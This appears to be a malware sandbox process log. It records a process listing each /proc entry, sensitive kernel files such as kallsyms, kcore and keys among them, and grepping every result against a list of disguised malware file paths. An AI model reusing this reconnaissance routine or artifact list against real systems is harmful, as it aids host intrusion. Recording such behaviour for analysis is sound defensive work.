/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1237
-
-
/bin/grepgrep exe2⤵PID:1240
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1239
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1242
-
-
/bin/grepgrep exe2⤵PID:1245
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1244
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1247
-
-
/bin/grepgrep exe2⤵PID:1250
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1249
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1252
-
-
/bin/grepgrep exe2⤵PID:1255
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1254
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1257
-
-
/bin/grepgrep exe2⤵PID:1260
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1259
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1262
-
-
/bin/grepgrep exe2⤵PID:1265
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1264
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1267
-
-
/bin/grepgrep exe2⤵PID:1270
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1269
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1272
-
-
/bin/grepgrep exe2⤵PID:1275
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1274
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1277
-
-
/bin/grepgrep exe2⤵PID:1280
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1279
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1282
-
-
/bin/grepgrep exe2⤵PID:1286
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1285
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1289
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1292
-
-
/bin/grepgrep exe2⤵PID:1293
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1296
-
-
/bin/grepgrep exe2⤵PID:1299
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1298
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1302
-
-
/bin/grepgrep exe2⤵PID:1306
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1305
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1308
-
-
/bin/grepgrep exe2⤵PID:1312
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1311
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1315
-
-
/bin/grepgrep exe2⤵PID:1318
-
-
/bin/lsls -latrh /proc/net2⤵PID:1317
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1321
-
-
/bin/grepgrep exe2⤵PID:1325
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1324
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1327
-
-
/bin/grepgrep exe2⤵PID:1331
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1330
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1334
-
-
/bin/grepgrep exe2⤵PID:1338
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1337
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1341
-
-
/bin/grepgrep exe2⤵PID:1344
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1343
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1347
-
-
/bin/grepgrep exe2⤵PID:1351
-
-
/bin/lsls -latrh /proc/self2⤵PID:1350
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1353
-
-
/bin/grepgrep exe2⤵PID:1356
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1355
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1360
-
-
/bin/grepgrep exe2⤵PID:1363
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1362
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1366
-
-
/bin/grepgrep exe2⤵PID:1370
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1369
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1372
-
-
/bin/grepgrep exe2⤵PID:1376
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1375
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1379
-
-
/bin/grepgrep exe2⤵PID:1383
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1382
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1386
-
-
/bin/grepgrep exe2⤵PID:1389
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1388
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1393
-
-
/bin/grepgrep exe2⤵PID:1396
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1395
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1399
-
-
/bin/grepgrep exe2⤵PID:1403
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1402
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1405
-
-
/bin/grepgrep exe2⤵PID:1409
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1408
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1412
-
-
/bin/grepgrep exe2⤵PID:1415
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1414
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1417
-
-
/bin/grepgrep exe2⤵PID:1420
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1419
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1422
-
-
/bin/grepgrep exe2⤵PID:1425
-
-
/bin/lsls -latrh /proc/version2⤵PID:1424
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1427
-
-
/bin/grepgrep exe2⤵PID:1430
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1429
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1432
-
-
/bin/grepgrep exe2⤵PID:1435
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1434
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1437
-
-
/bin/grepgrep exe2⤵PID:1440
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1439
-
-
